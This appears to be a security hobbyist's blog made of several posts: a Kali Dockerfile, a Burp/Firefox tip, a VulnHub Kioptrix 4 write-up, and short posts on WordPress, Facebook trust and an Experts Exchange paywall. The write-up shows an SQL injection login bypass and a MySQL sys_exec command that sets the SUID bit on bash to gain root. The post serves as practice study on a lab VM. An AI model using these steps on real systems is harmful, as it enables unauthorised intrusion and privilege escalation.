Since recently discovering there is now an official Kali Linux docker image, I’ve been fiddling with it and tweaking my own setup to get it to how I like it for the things I use it for. I have a work version and a personal version. What follows is my personal version, used mostly for R&D, CTF challenges, and bug hunting in my free time.
My Kali Dockerfile (for Mac)
# The Kali linux base image
# Update all the things, then install my personal faves
RUN apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && apt-get install -y \
# Create known_hosts for git cloning things I want
RUN mkdir /root/.ssh
RUN touch /root/.ssh/known_hosts
# Add host keys
RUN ssh-keyscan bitbucket.org >> /root/.ssh/known_hosts
RUN ssh-keyscan github.com >> /root/.ssh/known_hosts
# Clone git repos
RUN git clone https://github.com/danielmiessler/SecLists.git /opt/seclists
RUN git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit
RUN git clone https://github.com/hashcat/hashcat /opt/hashcat
RUN git clone https://github.com/rebootuser/LinEnum /opt/linenum
RUN git clone https://github.com/maurosoria/dirsearch /opt/dirsearch
RUN git clone https://github.com/sdushantha/sherlock.git /opt/sherlock
# Other installs of things I need
RUN apt-get install -y \
RUN pip install pwntools
# Update ENV
# Set entrypoint and working directory (Mac specific)
# Expose ports 80 and 443
EXPOSE 80/tcp 443/tcp
About a year ago, Mozilla added “captive portal” support to Firefox in an attempt to enhance usability when connecting to free WiFi portals, such as at an airport or a hotel. You have probably interacted with captive portals in the past, and if you are a Firefox user, you may have wondered why you had to open Chrome or IE or Safari to be able to log into the WiFi system, as you could only get the “Sign In” page to pop up in one of those browsers before getting access to the full Internet.
Firefox added support for these “Sign In” pages about a year ago, so that you don’t need to use a (shudder) different browser. That is all well and good, except for when it comes to using Burp Suite as a proxy for Firefox. If you are a pentester, you are probably used using Firefox (especially on Kali Linux) for your traffic proxying through Burp, as they make it easier than any other browser to set up and disable the proxy.
However, you may now be seeing a ton of requests like this:
Disable the detectportal.firefox.com requests
Seeing all those requests in Burp, much less thinking about all the noise they generate otherwise, is annoying. Because you probably won’t ever need to use a Captive Portal on your pentesting machine (a VM, in my case), you can completely disable Firefox’s attempts to detect them. Just browse to about:config and enter network.captive-portal-service.enabled. Double click it to change its value to “false” and you should be good to go.
In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.
Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I better start now. Other folks do similar write-ups on the VMs on vulnub.com, and I’ll see if they will add this to Kioptrix 1.3 page soon.
Hopefully, someone will find this useful either way.
It should be noted that this VM was known to have at least two possible paths to getting root on the system, and this writeup outline just one.
On my local network, this VM turned up with the IP address of 192.168.0.110.
Running an nmap scan revealed some open ports and running services:
[email protected]:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110
No basic SQL injection working from any initial attempts.
Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.
Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
dirb and dirsearch
A basic dirb scan turned up a directory: http://192.168.0.110/john/
I though that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one: http://192.168.0.110/robert/
Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.
I also ran DIRSEARCH, a python tool that also works well for finding directories and files. found file: database.sql
(Note: Dirsearch is not included in Kali by default. Requires you to setup Python 3 in a virtual environment to run it.)
Since ports 139 and 445 were being used, I went on try enum4linux
[email protected]:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017
(Pasting only the relevant stuff here.)
| Enumerating Workgroup/Domain on 192.168.0.110 |
[+] Got domain/workgroup name: WORKGROUP
| Nbtstat Information for 192.168.0.110 |
Looking up status of 192.168.0.110
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
| Users on 192.168.0.110 |
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
| Share Enumeration on 192.168.0.110 |
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)
[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
| Password Policy Information for 192.168.0.110 |
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
enum4linux complete on Thu Feb 9 00:40:51 2017
I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.
You can use Hydra to brute force FTP, SSH, POP3, and SMTP account. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:
This was found during discover with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.
Immediately, the first thing to note is that there’s a username and password shown in the dump file.
Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck! I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.
Perhaps it’d work with SSH or SMB? Negatory
The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.
After a number of failed attempts and errors by trying various SQL injection strings, using this worked:
Password: ' OR 1=1 #
That took me to the User Admin Panel and showed the actual password.
That seemed kinda easy. But this is when things got hard, actually.
I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!
Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:
I was warned about trying to cd into the root directory, and getting kicked out if I tried again.
lpath is the same as pwd.
The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile
Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:
Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.
Must break out of the restricted “LigGoat” shell. To the Google!
Trying a number of things, I finally found the right trick, which is to use Python to switch shells:
That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337
Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.
Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement had the mysql connection string, including the username and password, which were simply:
user: root pass: (empty)
That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:
Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:
“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”
The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.
Modifying those instructions a little, there was no need to compile a c script (which I was unable to do as user ‘john’ anyway.
It described the situation perfectly:
"We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often."
The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn't need to grab it from sqlmap and upload it to the system.
Modifying those instructions a little, there was no need to compile a c script that changes users.
Instead of this line:
select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
Just do this:
select sys_exec('chmod u+s /bin/bash');
Then drop out of MySQL and run this:
Ø bash -p
It should drop you into a root shell!
WordPress as a platform has been a solid, secure application over the years. The few times a vulnerability has been found, the WP team has been super-fast to patch it, publicize it, and take care of business.
That said, there are two major areas where WordPress lacks in security:
There are so many plugins for WordPress, which is part of what makes it so great. However, those plugins can also present attack vectors, and we see evidence of this almost every day.
It was just revealed that most WP users have very little understanding of the risk they are lending to their own websites. Not updating plugins, not updating WP itself, and not doing backups, are the most easily fixed things that people tend to not do.
This puts WP websites at risk, lets them get hacked, and gives WordPress as a whole a bad wrap.
The survey of 503 WordPress users, which took place online during February this year, revealed that WordPress users are more exposed to security problems than expected. In total, 54 percent of respondents said they updated WordPress between once a week and every few weeks, and yet only 24 percent back their websites up — and only 23 percent have received training in the use of tools such as backup plugins.
This article explains why you can’t trust your friends on Facebook. It demonstrates how easy it is to gain someone’s trust by using an account that they think is that of a friend. The next time your friend on Facebook asks you to borrow some money, or asks when you are going out of town, think twice.
Over the years, Experts Exchange has become quite the repository of tech advice, where people go to ask questions, then the experts compete to give the best answer and win the asker’s vote. It’s a pretty slick system, I suppose, if you are an ‘expert’, and your goal in life is seeing your username at the top of a list on their site, or if you have a question and have been unable to find an answer to it on any of the completely free message boards across the internet.
Whatever your reason for paying the fee to join their site, you have probably run across one of their pages if you have been searching for answers to a technical problem online. Their search engine placement has been historically good for a wide variety of key words and phrases.
A Bit of History
You have also probably run across Expert Exchange’s efforts to protect their paid content from the casual observer. If you are like me, you have seen them at the top of a search results page, cussed them out in your head, then moved on to the next result. That is because you know they often seem to have people asking the exact same thing you are in search of, and they seem to have people who have provided answers/solutions, but when you go there you are asked to pay to see the answers. But being the freebie seeking geek you are, you haven’t ever signed up for their site.
For a long time, I thought that they had ended up removing their experts’ answers altogether. However, I learned that Experts Exchange is using a simple visual cue to make you think this so that you won’t find the coveted content for which they take great lengths to protect (and charge you $12.95 a month for access to).
The secret is, if you just keep scrolling down the page, you will see all the answers to the question at the top of the page! What they do to make you think there is nothing there is show several empty bars of “Expert Comment” and “Accepted Solution”, followed by a “Sign up to view this solution” section, making you think the content is hidden. Below that, you will see a ton of “footer links”, making you think you are at the bottom of the page. However, keep going, and you will find the hidden pot o’ gold.
This isn’t to say I don’t advocate paying for their service. I actually had the company I used to work for pay the fee a few years ago, but didn’t find myself using it that much, so I didn’t ask them to renew it.
In summary, scroll scroll scroll your way to the bottom of the page when you find an Experts Exchange result while troubleshooting on the Internet.